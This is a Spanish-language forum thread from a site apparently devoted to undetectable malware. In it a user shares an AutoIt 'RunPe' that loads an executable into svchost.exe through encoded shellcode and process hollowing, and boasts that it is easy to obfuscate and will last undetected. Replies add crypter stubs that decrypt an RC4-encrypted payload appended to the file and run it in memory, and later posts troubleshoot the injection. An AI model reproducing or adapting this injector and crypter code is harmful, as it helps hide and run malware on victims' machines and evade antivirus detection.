Indetectables

Publicado: **22 Oct 2012, 01:41**

Buenas , los dejo este Runpe hecho en AutoIt para que disfruteis , ya que no tienem muchos por ay .....

"Regalo del nacimiento de Mi Hija Isabella"

Se agrega en svchost.exe para cargar en la memoria e és muy facil de ofuscar , asi que creo durará mucho ....

Saludos e comentem se tienem duda

Código: Seleccionar todo


;=================================================
; AutoIt RunExeFromMemory ( ShellCode )
; Autor : M3
; Creditos a : Hamavb , IcodeInVb6 , Pink (Udtools.net) , Ward
; Proposito : Correr Ejecutable en la Memoria
; Testeado en : XP SP3 | Vista | W7 32 | 64
; Uso : RunExeFromMemory(Binary)
;=================================================


Local $sBinary = FileOpenDialog("Elija tu Servidor para Ejecutar en la Memoria", "", "Archivos exe (*.exe)")

Call ( RunExeFromMemory(Fileread($sBinary)))





Func RunExeFromMemory($Binary)

    Global $Memory ,  $FileBuffer

	$Memory = DllStructCreate("Boolean[" & sReadBytes(sShellCode()) & "]")
	$FileBuffer = DllStructCreate("Boolean[" & sReadBytes($Binary) & "]")
	DllStructSetData($Memory, 1, sShellRead(sShellCode()))
	DllStructSetData($FileBuffer, 1, $Binary)

	Call ( CWPA( sStructBuffer(), sInjectMyApp(), sStructBin(), False, False ))

EndFunc




Func sStructBuffer()

	Local $Ret = DllStructGetPtr($Memory)
    Return $Ret

EndFunc




Func sStructBin()

	Local $Ret2 = DllStructGetPtr($FileBuffer)
    Return $Ret2

EndFunc





Func CWPA($lpPrevWndFunc, $hWnd, $Msg, $wParam, $lParam)

	Local $Return
	$Return = DllCall("User32", "none", "CallWindowProcA", "ptr", $lpPrevWndFunc, "wstr", $hWnd, "ptr", $Msg, "int", $wParam, "int", $lParam)

EndFunc






Func sInjectMyApp()

	Local $sInject = @SystemDir & "\svchost.exe"
	Return $sInject

EndFunc





Func sShellCode ()

   Local $Buffer
	     $Buffer = "0x" & "3078363045383445303030303030364230303635303037323030364530303635303036433030333330303332303030303030364530303734303036343030364" & _
	"33030364330303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030" & _
	"30303030303030303030303030303030303030303030303030303030303030303542384246433641343245384242303330303030384235343234323838393131384235343234324336413" & _
	"34545384141303330303030383931313641344145384131303330303030383933393641314536413343453839443033303030303641323236384634303030303030453839313033303030" & _
	"30364132363641323445383838303330303030364132413641343045383746303330303030364132453641304345383736303330303030364133323638433830303030303045383641303" & _
	"33030303036413241453835433033303030303842303943373031343430303030303036413132453834443033303030303638354245383134434635314538373930333030303036413345" & _
	"45383342303330303030384244313641314545383332303330303030364134304646333246463331464644303641313245383233303330303030363835424538313443463531453834463" & _
	"03330303030364131454538313130333030303038423039384235313343364133454538303530333030303038423339303346413641323245384641303230303030384230393638463830" & _
	"30303030303537353146464430364130304538453830323030303036383838464542333136353145383134303330303030364132454538443630323030303038423339364132414538434" & _
	"43032303030303842313136413432453843343032303030303537353236413030364130303641303436413030364130303641303036413030464633314646443036413132453841393032" & _
	"30303030363844303337313046323531453844353032303030303641323245383937303230303030384231313641324545383845303230303030384230394646373233344646333146464" & _
	"43036413030453837453032303030303638394339353141364535314538414130323030303036413232453836433032303030303842313138423339364132454538363130323030303038" & _
	"42303936413430363830303330303030304646373235304646373733344646333146464430364133364538343730323030303038424431364132324538334530323030303038423339364" & _
	"13345453833353032303030303842333136413232453832433032303030303842303136413245453832333032303030303842303935324646373735343536464637303334464633313641" & _
	"30304538313030323030303036384131364133444438353145383343303230303030383343343043464644303641313245384639303130303030363835424538313443463531453832353" & _
	"03230303030364132324538453730313030303038423131383343323036364133414538444230313030303036413032353235314646443036413336453843453031303030304337303130" & _
	"30303030303030423832383030303030303641333645384243303130303030463732313641314545384233303130303030384231313842353233433831433246383030303030303033443" & _
	"03641334545383946303130303030303331313641323645383936303130303030364132383532464633313641313245383841303130303030363835424538313443463531453842363031" & _
	"30303030383343343043464644303641323645383733303130303030384233393842303938423731313436413345453836353031303030303033333136413236453835433031303030303" & _
	"84230393842353130433641323245383530303130303030384230393033353133343641343645383434303130303030384243313641324545383342303130303030384230393530464637" & _
	"37313035363532464633313641303045383241303130303030363841313641334444383531453835363031303030303833433430434646443036413336453831333031303030303842313" & _
	"13833433230313839313136413341453830353031303030303842303933424341304638353333464646464646364133324538463430303030303038423039433730313037303030313030" & _
	"36413030453845353030303030303638443243374137363835314538313130313030303036413332453844333030303030303842313136413245453843413030303030303842303935324" & _
	"64637313034464644303641323245384242303030303030384233393833433733343641333245384146303030303030384233313842423641343030303030303833433630383641324545" & _
	"38394430303030303038423131364134364538393430303030303035313641303435373536464633323641303045383836303030303030363841313641334444383531453842323030303" & _
	"03030383343343043464644303641323245383646303030303030384230393842353132383033353133343641333245383630303030303030384230393831433142303030303030303839" & _
	"31313641303045383446303030303030363844334337413745383531453837423030303030303641333245383344303030303030384244313641324545383334303030303030384230394" & _
	"64633324646373130344646443036413030453832343030303030303638383833463441394535314538353030303030303036413245453831323030303030303842303946463731303446" & _
	"46443036413441453830343030303030303842323136314333384243423033344332343034433336413030453846324646464646463638353443414146393135314538314530303030303" & _
	"03641343036383030313030303030464637343234313836413030464644304646373432343134453843464646464646463839303138334334313043334538323230303030303036384134" & _
	"34453045454335304538344230303030303038334334303846463734323430344646443046463734323430383530453833383030303030303833433430384333353535323531353335363" & _
	"53733334330363438423730333038423736304338423736314338423645303838423745323038423336333834373138373546333830334636423734303738303346344237343032454245" & _
	"37384243353546354535423539354135444333353535323531353335363537384236433234314338354544373434333842343533433842353432383738303344353842344131383842354" & _
	"13230303344444533333034393842333438423033463533334646333343304643414338344330373430374331434630443033463845424634334237433234323037354531384235413234" & _
	"3033444436363842304334423842354131433033444438423034384230334335354635453542353935413544433343333030303030303030"

	Return $Buffer

EndFunc




Func sShellRead($sData)

    Local $sValue

	For $i = 1 To sReadBytes($sData)
        $sValue &= Chr(sValue(BinaryMid($sData , $i , 1)))
    Next

	Return $sValue

EndFunc





Func sReadBytes($Data)

	Local $Value = BinaryLen($Data)
	Return $Value

EndFunc





Func sValue($Value)

    Local $Result = Execute($Value)
    Return Number($Result)

EndFunc

Publicado: **22 Oct 2012, 15:41**

Muchas gracias compa. esta excelente me haré un juguete :)
saludos maquina

Publicado: **22 Oct 2012, 20:54**

Gracias = a ti capo , un saludo amigo

Como debería de llamar a este RunPe M3 ? Por ejemplo con este Sub Main : Creado por ti ..

Código: Seleccionar todo

Func SubMain()

	  $sAppPath = @ScriptFullPath
	  $sKey = "\\BYM3\\"
	  $AppExe = $sAppPath
	  $sArquive = FileRead($sAppPath)
	  $sParams = StringInstr($sArquive, $sKey)
	  $sLen = $sParams + sLenEx ($sKey)
	  $sArquive = StringMid($sArquive,  $sLen)
	  Call (_RunPE(_RC4($sArquive, $sKey)))

    EndFunc

K7 escribió:Como debería de llamar a este RunPe M3 ? Por ejemplo con este Sub Main : Creado por ti ..

Código: Seleccionar todo

Func SubMain()

	  $sAppPath = @ScriptFullPath
	  $sKey = "\\BYM3\\"
	  $AppExe = $sAppPath
	  $sArquive = FileRead($sAppPath)
	  $sParams = StringInstr($sArquive, $sKey)
	  $sLen = $sParams + sLenEx ($sKey)
	  $sArquive = StringMid($sArquive,  $sLen)
	  Call (_RunPE(_RC4($sArquive, $sKey)))

    EndFunc

Si con ese puedes llamarlo.

saludos

exacto como disses Pink ... see , lo podes

aca te dejo otro ejemplo se te sirve:

Código: Seleccionar todo

Func SubMain()

	  $sAppPath = @ScriptFullPath
	  $Delim= "\\\\"
	  $sAPP = FileRead($sAppPath)
	  $sSplit = StringSplit($sAPP, $Delim, 1)
     Call (RunExeFromMemory(sRC4($sSplit[2] ,"PassWordxD")))


EndFunc

Muy bueno tío, segid dandole duro al AutoIt.

Publicado: **12 Jul 2015, 21:41**

Se agradece , queria usar tu RunPe pero sin la injeccion en svchost, osea sin inyectarse, podrías ayudarme?

Publicado: **13 Jul 2015, 00:53**

Elargrt escribió:Se agradece , queria usar tu RunPe pero sin la injeccion en svchost, osea sin inyectarse, podrías ayudarme?

Canbia el svchost por otro , sin injectarse no ay como , puedes usar la propria ruta del exe tanbiem

te dejo estes por si las moscas

http://indetectables.net/viewtopic.php?f=100&t=48430
http://indetectables.net/viewtopic.php?f=100&t=45679

saludo

Publicado: **13 Jul 2015, 01:18**

M3 escribió:
Elargrt escribió:Se agradece , queria usar tu RunPe pero sin la injeccion en svchost, osea sin inyectarse, podrías ayudarme?

Canbia el svchost por otro , sin injectarse no ay como , puedes usar la propria ruta del exe tanbiem

te dejo estes por si las moscas

http://indetectables.net/viewtopic.php?f=100&t=48430
http://indetectables.net/viewtopic.php?f=100&t=45679

saludo

si ,trate de usar la ruta del exe que se va a ejecutar y no funciona, igual gracias.

Publicado: **13 Jul 2015, 01:29**

Te quedo de a madres amigo,muchas gracias por compartirlo. Saludos

Publicado: **13 Jul 2015, 01:35**

Gracias compas

Elargrt
Quizas sea el archivo que esta utilizando no ? Injectando en Svchost te anda y en la ruta del EXE no ???

Todavia suerte compadre

Publicado: **13 Jul 2015, 03:26**

M3 escribió:Gracias compas

Elargrt
Quizas sea el archivo que esta utilizando no ? Injectando en Svchost te anda y en la ruta del EXE no ???

Todavia suerte compadre

Injectando en Svchost anda perfecto, pero usando la ruta del EXE no sirve

Publicado: **14 Jul 2015, 01:05**

Me Yo lo compile con el autoit,me abre le pongo el exe a usar y cuando empieza el script me deja de funcionar y cierra? alguna sugerencia?

Publicado: **14 Jul 2015, 05:44**

n0z escribió:Me Yo lo compile con el autoit,me abre le pongo el exe a usar y cuando empieza el script me deja de funcionar y cierra? alguna sugerencia?

Que version de autoit utilizas ? usa la version 3.3.8.1

Elargrt

Quizas sea tu archivo , proba com otro a ver se te da lo mismo

Suerte compa

Indetectables

RunExeFromMemory (ShellCode RunPe)

RunExeFromMemory (ShellCode RunPe)

Re: RunExeFromMemory (ShellCode RunPe)

Re: RunExeFromMemory (ShellCode RunPe)

Re: RunExeFromMemory (ShellCode RunPe)

Re: RunExeFromMemory (ShellCode RunPe)

Re: RunExeFromMemory (ShellCode RunPe)

Re: RunExeFromMemory (ShellCode RunPe)

Re: RunExeFromMemory (ShellCode RunPe)

Re: RunExeFromMemory (ShellCode RunPe)

Re: RunExeFromMemory (ShellCode RunPe)

Re: RunExeFromMemory (ShellCode RunPe)

Re: RunExeFromMemory (ShellCode RunPe)

Re: RunExeFromMemory (ShellCode RunPe)

Re: RunExeFromMemory (ShellCode RunPe)

Re: RunExeFromMemory (ShellCode RunPe)